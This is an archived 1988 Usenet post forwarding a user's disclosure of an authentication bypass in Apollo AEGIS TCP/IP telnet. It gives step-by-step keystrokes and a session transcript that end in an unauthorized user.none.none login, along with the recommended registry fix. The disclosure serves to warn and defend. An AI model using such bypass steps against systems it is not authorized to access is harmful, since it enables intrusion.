Path: utzoo!attcan!uunet!lll-winken!lll-tis!helios.ee.lbl.gov!pasteur!ucbvax!DELRIO.CC.UMICH.EDU!paul
From: paul@DELRIO.CC.UMICH.EDU ('da Kingfish)
Newsgroups: comp.sys.apollo
Subject: Forwarded message -- Security on APOLLO TCP/IP network
Message-ID: <8806080536.AA19951@delrio.cc.umich.edu>
Date: 8 Jun 88 05:36:52 GMT
Sender: daemon@ucbvax.BERKELEY.EDU
Organization: The Internet
Lines: 96

------- Forwarded Message

Date: Thu, 02 Jun 88 14:19:57 -0700
From: NKARIMI@gpvax.JPL.NASA.GOV
To: apollo%yale.arpa@jpl-mil.ARPA
Subject: Security on APOLLO TCP/IP network

Hello,

I have a question about TCP/IP network security on the APOLLO
workstations. Does APOLLO sell any off-the-shelf software/hardware
products that have some kind of encryption technique for when you are
doing TELNET or FTP? Except the Userid/Password protection, is there
any other way I can make sure unauthorized people cannot access our
workstations?

Also, recently I came across something that looked like a major
security issue to me on the APOLLO workstation. Try this experiment:

1) TELNET to an APOLLO workstation that is running the AEGIS TCP/IP
   network software.
2) For the USERID, type in: USER
3) For the password, type in some junk characters.

   The telnet_server on the other machine comes back with the message:

   Invalid attempt to log in
   l name [project [org]] [-p] [-h]
   -p will allow you to change your password
   -h will allow you to change your home directory
   % may be used as wildcard for project or org
   Please log in:

   (So far everything is fine.)

4) At the "Please log in: " prompt, type in: USER again
5) For the password, type in ^C (control-C).

You will get logged in as user.none.none !!

If you don't believe me, the exact session follows:

- ---------------------------------------------------
$ telnet xxx.xxx.x.xxx
Trying...
Open Apollo Telnet Daemon
Erase is ^H and Kill is ^U
Please log in: user
Password:
Invalid attempt to log in
l name [project [org]] [-p] [-h]
-p will allow you to change your password
-h will allow you to change your home directory
% may be used as wildcard for project or org
Please log in: user
Password:
Using local registry. Can't use network registry: - process interrupt (from OS / fault handler)
Logged in as user.none.none on 1988/06/02 Thu 12:29 (PST).
$
- ----------------------------------------------------

NOW, THAT TO ME IS A MAJOR SECURITY BREAK.

So, I called in some of the APOLLO people that I knew, and the
response I got back was this:

"Well, it is basically a feature that APOLLO has included so that if
by any chance you mess-up your registries and there is no way that you
can get in to your system, then you can get logged in as user.none and
try to recover your registries".

I was told the solution to this problem is to delete the
user.none.none entry from our registries and then the problem should
be fixed.

So a warning to all APOLLO users that are running the AEGIS TCP/IP
network software: delete your user.none.none or anybody can log in to
your system.

Now, why hasn't this FEATURE been documented anywhere?

Note: the above problem does not exist on the workstations that are
running DOMAIN/IX.

Thanks for listening

Nader Karimi

------- End of Forwarded Message